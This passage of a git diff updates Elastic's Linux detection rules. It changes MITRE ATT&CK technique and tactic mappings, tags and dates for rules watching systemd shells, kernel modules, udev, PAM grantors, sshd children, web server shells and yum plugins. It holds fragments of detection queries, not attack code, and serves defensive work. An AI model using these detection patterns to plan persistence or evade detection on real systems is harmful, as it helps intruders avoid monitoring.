"T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" +id = "T1569" +name = "System Services" +reference = "https://attack.mitre.org/techniques/T1569/" [[rule.threat.technique.subtechnique]] -id = "T1543.002" -name = "Systemd Service" -reference = "https://attack.mitre.org/techniques/T1543/002/" +id = "T1569.002" +name = "Service Execution" +reference = "https://attack.mitre.org/techniques/T1569/002/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" @@ -229,10 +221,9 @@ name = "Systemd Service" reference = "https://attack.mitre.org/techniques/T1543/002/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.new_terms] field = "new_terms_fields" value = ["process.parent.executable"] diff --git a/rules/linux/persistence_systemd_shell_execution.toml b/rules/linux/persistence_systemd_shell_execution.toml index 634b59f4e98..2c91b1b2964 100644 --- a/rules/linux/persistence_systemd_shell_execution.toml +++ b/rules/linux/persistence_systemd_shell_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -78,15 +78,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Privilege Escalation", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -99,19 +91,19 @@ process.parent.command_line == "/sbin/init" and process.args_count >= 2 framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" [[rule.threat.technique.subtechnique]] -id = "T1543.002" -name = "Systemd Service" -reference = "https://attack.mitre.org/techniques/T1543/002/" +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" @@ -127,6 +119,6 @@ name = "Systemd Service" reference = "https://attack.mitre.org/techniques/T1543/002/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/linux/persistence_tainted_kernel_module_load.toml b/rules/linux/persistence_tainted_kernel_module_load.toml index 367963adfec..39f39886aa1 100644 --- a/rules/linux/persistence_tainted_kernel_module_load.toml +++ b/rules/linux/persistence_tainted_kernel_module_load.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/23" integration = ["system"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -75,14 +75,7 @@ Filebeat is a lightweight shipper for forwarding and centralizing log data. Inst - To run the system module of Filebeat on Linux follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-system.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Defense Evasion", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" query = ''' @@ -112,11 +105,16 @@ reference = "https://attack.mitre.org/tactics/TA0003/" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1014" -name = "Rootkit" -reference = "https://attack.mitre.org/techniques/T1014/" +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" + +[[rule.threat.technique.subtechnique]] +id = "T1547.006" +name = "Kernel Modules and Extensions" +reference = "https://attack.mitre.org/techniques/T1547/006/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_tainted_kernel_module_out_of_tree_load.toml b/rules/linux/persistence_tainted_kernel_module_out_of_tree_load.toml index b1e5e98060a..423e1b87ade 100644 --- a/rules/linux/persistence_tainted_kernel_module_out_of_tree_load.toml +++ b/rules/linux/persistence_tainted_kernel_module_out_of_tree_load.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/26" integration = ["system"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -76,14 +76,7 @@ Filebeat is a lightweight shipper for forwarding and centralizing log data. Inst - To run the system module of Filebeat on Linux follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-system.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Defense Evasion", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -109,16 +102,3 @@ reference = "https://attack.mitre.org/techniques/T1547/006/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1014" -name = "Rootkit" -reference = "https://attack.mitre.org/techniques/T1014/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_udev_rule_creation.toml b/rules/linux/persistence_udev_rule_creation.toml index b58e6b0f925..d4279c8b34f 100644 --- a/rules/linux/persistence_udev_rule_creation.toml +++ b/rules/linux/persistence_udev_rule_creation.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/26" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -128,16 +128,16 @@ file.path like ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1037" -name = "Boot or Logon Initialization Scripts" -reference = "https://attack.mitre.org/techniques/T1037/" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" +[[rule.threat.technique.subtechnique]] +id = "T1546.017" +name = "Udev Rules" +reference = "https://attack.mitre.org/techniques/T1546/017/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" diff --git a/rules/linux/persistence_unpack_initramfs_via_unmkinitramfs.toml b/rules/linux/persistence_unpack_initramfs_via_unmkinitramfs.toml index 6d45ba99f78..87713a3d441 100644 --- a/rules/linux/persistence_unpack_initramfs_via_unmkinitramfs.toml +++ b/rules/linux/persistence_unpack_initramfs_via_unmkinitramfs.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -112,43 +112,7 @@ id = "T1542" name = "Pre-OS Boot" reference = "https://attack.mitre.org/techniques/T1542/" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_unusual_exim4_child_process.toml b/rules/linux/persistence_unusual_exim4_child_process.toml index 1b804697747..74a2dd1de26 100644 --- a/rules/linux/persistence_unusual_exim4_child_process.toml +++ b/rules/linux/persistence_unusual_exim4_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/30" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -58,14 +58,7 @@ references = [ risk_score = 21 rule_id = "6eb862bb-013d-4d4f-a14b-341433ca1a1f" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Initial Access", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -80,20 +73,27 @@ not process.name:( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1037" -name = "Boot or Logon Initialization Scripts" -reference = "https://attack.mitre.org/techniques/T1037/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1554" -name = "Compromise Host Software Binary" -reference = "https://attack.mitre.org/techniques/T1554/" +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules/linux/persistence_unusual_pam_grantor.toml b/rules/linux/persistence_unusual_pam_grantor.toml index 962c7bb3a3f..3cc6949feda 100644 --- a/rules/linux/persistence_unusual_pam_grantor.toml +++ b/rules/linux/persistence_unusual_pam_grantor.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/06" integration = ["auditd_manager"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -65,15 +65,7 @@ Add Auditd Manager For this detection rule to trigger, no additional configuration is required. """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Tactic: Persistence", - "Data Source: Auditd Manager", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Auditd Manager", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -85,14 +77,19 @@ auditd.data.grantors:(* and not (pam_rootok or *pam_cap* or *pam_permit*)) framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.003" +name = "Pluggable Authentication Modules" +reference = "https://attack.mitre.org/techniques/T1556/003/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [[rule.threat]] framework = "MITRE ATT&CK" @@ -102,11 +99,15 @@ id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat.technique.subtechnique]] +id = "T1556.003" +name = "Pluggable Authentication Modules" +reference = "https://attack.mitre.org/techniques/T1556/003/" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.new_terms] field = "new_terms_fields" value = ["auditd.data.grantors"] diff --git a/rules/linux/persistence_unusual_sshd_child_process.toml b/rules/linux/persistence_unusual_sshd_child_process.toml index 9acdc41ffa3..92d8b579227 100644 --- a/rules/linux/persistence_unusual_sshd_child_process.toml +++ b/rules/linux/persistence_unusual_sshd_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/16" integration = ["endpoint", "crowdstrike"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -53,15 +53,7 @@ references = ["https://hadess.io/the-art-of-linux-persistence/"] risk_score = 21 rule_id = "4c3c6c47-e38f-4944-be27-5c80be973bd7" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Lateral Movement", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -77,24 +69,6 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" - -[[rule.threat.technique.subtechnique]] -id = "T1546.004" -name = "Unix Shell Configuration Modification" -reference = "https://attack.mitre.org/techniques/T1546/004/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1021" name = "Remote Services" @@ -105,16 +79,6 @@ id = "T1021.004" name = "SSH" reference = "https://attack.mitre.org/techniques/T1021/004/" -[[rule.threat.technique]] -id = "T1563" -name = "Remote Service Session Hijacking" -reference = "https://attack.mitre.org/techniques/T1563/" - -[[rule.threat.technique.subtechnique]] -id = "T1563.001" -name = "SSH Hijacking" -reference = "https://attack.mitre.org/techniques/T1563/001/" - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" @@ -123,11 +87,15 @@ reference = "https://attack.mitre.org/tactics/TA0008/" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat.technique]] +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules/linux/persistence_user_or_group_creation_or_modification.toml b/rules/linux/persistence_user_or_group_creation_or_modification.toml index 989aedbc3a6..9464079f355 100644 --- a/rules/linux/persistence_user_or_group_creation_or_modification.toml +++ b/rules/linux/persistence_user_or_group_creation_or_modification.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/20" integration = ["auditd_manager"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -110,6 +110,16 @@ event.action in ("changed-password", "added-user-account", "added-group-account- [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" + [[rule.threat.technique]] id = "T1136" name = "Create Account" diff --git a/rules/linux/persistence_web_server_sus_child_spawned.toml b/rules/linux/persistence_web_server_sus_child_spawned.toml index 9bf48a74d57..e1fcf81978d 100644 --- a/rules/linux/persistence_web_server_sus_child_spawned.toml +++ b/rules/linux/persistence_web_server_sus_child_spawned.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/04" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -82,16 +82,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Execution", - "Tactic: Command and Control", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" query = ''' @@ -193,24 +184,6 @@ from logs-endpoint.events.process-* metadata _id, _index, _version [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1505" -name = "Server Software Component" -reference = "https://attack.mitre.org/techniques/T1505/" - -[[rule.threat.technique.subtechnique]] -id = "T1505.003" -name = "Web Shell" -reference = "https://attack.mitre.org/techniques/T1505/003/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -230,11 +203,16 @@ reference = "https://attack.mitre.org/tactics/TA0002/" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" +id = "T1505" +name = "Server Software Component" +reference = "https://attack.mitre.org/techniques/T1505/" + +[[rule.threat.technique.subtechnique]] +id = "T1505.003" +name = "Web Shell" +reference = "https://attack.mitre.org/techniques/T1505/003/" [rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/linux/persistence_web_server_sus_command_execution.toml b/rules/linux/persistence_web_server_sus_command_execution.toml index bd1fd7cbd10..f18d9334015 100644 --- a/rules/linux/persistence_web_server_sus_command_execution.toml +++ b/rules/linux/persistence_web_server_sus_command_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/04" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -89,16 +89,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Execution", - "Tactic: Command and Control", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" query = ''' @@ -178,24 +169,6 @@ from logs-endpoint.events.process-* metadata _id, _index, _version [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1505" -name = "Server Software Component" -reference = "https://attack.mitre.org/techniques/T1505/" - -[[rule.threat.technique.subtechnique]] -id = "T1505.003" -name = "Web Shell" -reference = "https://attack.mitre.org/techniques/T1505/003/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -210,16 +183,3 @@ reference = "https://attack.mitre.org/techniques/T1059/004/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/persistence_web_server_sus_destination_port.toml b/rules/linux/persistence_web_server_sus_destination_port.toml index 1c274eb2f45..9927329fab5 100644 --- a/rules/linux/persistence_web_server_sus_destination_port.toml +++ b/rules/linux/persistence_web_server_sus_destination_port.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/05" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -80,16 +80,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Execution", - "Tactic: Command and Control", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -114,48 +105,12 @@ not cidrmatch(destination.ip, "127.0.0.0/8", "::1","FE80::/10", "FF00::/8", "10. [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -name = "Persistence" -id = "TA0003" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat.technique]] -id = "T1505" -name = "Server Software Component" -reference = "https://attack.mitre.org/techniques/T1505/" - -[[rule.threat.technique.subtechnique]] -id = "T1505.003" -name = "Web Shell" -reference = "https://attack.mitre.org/techniques/T1505/003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -name = "Execution" -id = "TA0002" -reference = "https://attack.mitre.org/tactics/TA0002/" - [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "T1571" +name = "Non-Standard Port" +reference = "https://attack.mitre.org/techniques/T1571/" [rule.threat.tactic] -name = "Command and Control" id = "TA0011" +name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat.technique]] -name = "Application Layer Protocol" -id = "T1071" -reference = "https://attack.mitre.org/techniques/T1071/" diff --git a/rules/linux/persistence_web_server_unusual_command_execution.toml b/rules/linux/persistence_web_server_unusual_command_execution.toml index e8c298819bd..3b19de7ec1c 100644 --- a/rules/linux/persistence_web_server_unusual_command_execution.toml +++ b/rules/linux/persistence_web_server_unusual_command_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/02" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/24" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -51,15 +51,7 @@ This rule detects shells invoked by web server processes on Linux to run one-off risk_score = 47 rule_id = "65f28c4d-cfc8-4847-9cca-f2fb1e319151" severity = "medium" -tags = [ - "Domain: Endpoint", - "Domain: Web", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "Domain: Web", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -97,24 +89,6 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1505" -name = "Server Software Component" -reference = "https://attack.mitre.org/techniques/T1505/" - -[[rule.threat.technique.subtechnique]] -id = "T1505.003" -name = "Web Shell" -reference = "https://attack.mitre.org/techniques/T1505/003/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -134,15 +108,19 @@ reference = "https://attack.mitre.org/tactics/TA0002/" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" +id = "T1505" +name = "Server Software Component" +reference = "https://attack.mitre.org/techniques/T1505/" -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat.technique.subtechnique]] +id = "T1505.003" +name = "Web Shell" +reference = "https://attack.mitre.org/techniques/T1505/003/" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.new_terms] field = "new_terms_fields" value = ["process.command_line"] diff --git a/rules/linux/persistence_yum_package_manager_plugin_file_creation.toml b/rules/linux/persistence_yum_package_manager_plugin_file_creation.toml index cfc4377bf4d..6eae96657f5 100644 --- a/rules/linux/persistence_yum_package_manager_plugin_file_creation.toml +++ b/rules/linux/persistence_yum_package_manager_plugin_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/25" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -85,15 +85,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -126,21 +118,6 @@ file.path : ("/usr/lib/yum-plugins/*", "/etc/yum/pluginconf.d/*") and not ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" - -[[rule.threat.technique.subtechnique]] -id = "T1546.016" -name = "Installer Packages" -reference = "https://attack.mitre.org/techniques/T1546/016/" - [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" @@ -150,11 +127,3 @@ reference = "https://attack.mitre.org/techniques/T1574/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/privilege_escalation_chown_chmod_unauthorized_file_read.toml b/rules/linux/privilege_escalation_chown_chmod_unauthorized_file_read.toml index bfc29e3bbe6..4258204ccb0 100644 --- a/rules/linux/privilege_escalation_chown_chmod_unauthorized_file_read.toml +++ b/rules/linux/privilege_escalation_chown_chmod_unauthorized_file_read.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/28" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -87,19 +87,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Tactic: Credential Access", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Auditd Manager", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Auditd Manager", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -112,29 +100,16 @@ process where host.os.type == "linux" and event.type == "start" and framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1068" -name = "Exploitation for Privilege Escalation" -reference = "https://attack.mitre.org/techniques/T1068/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - -[[rule.threat]] -framework = "MITRE 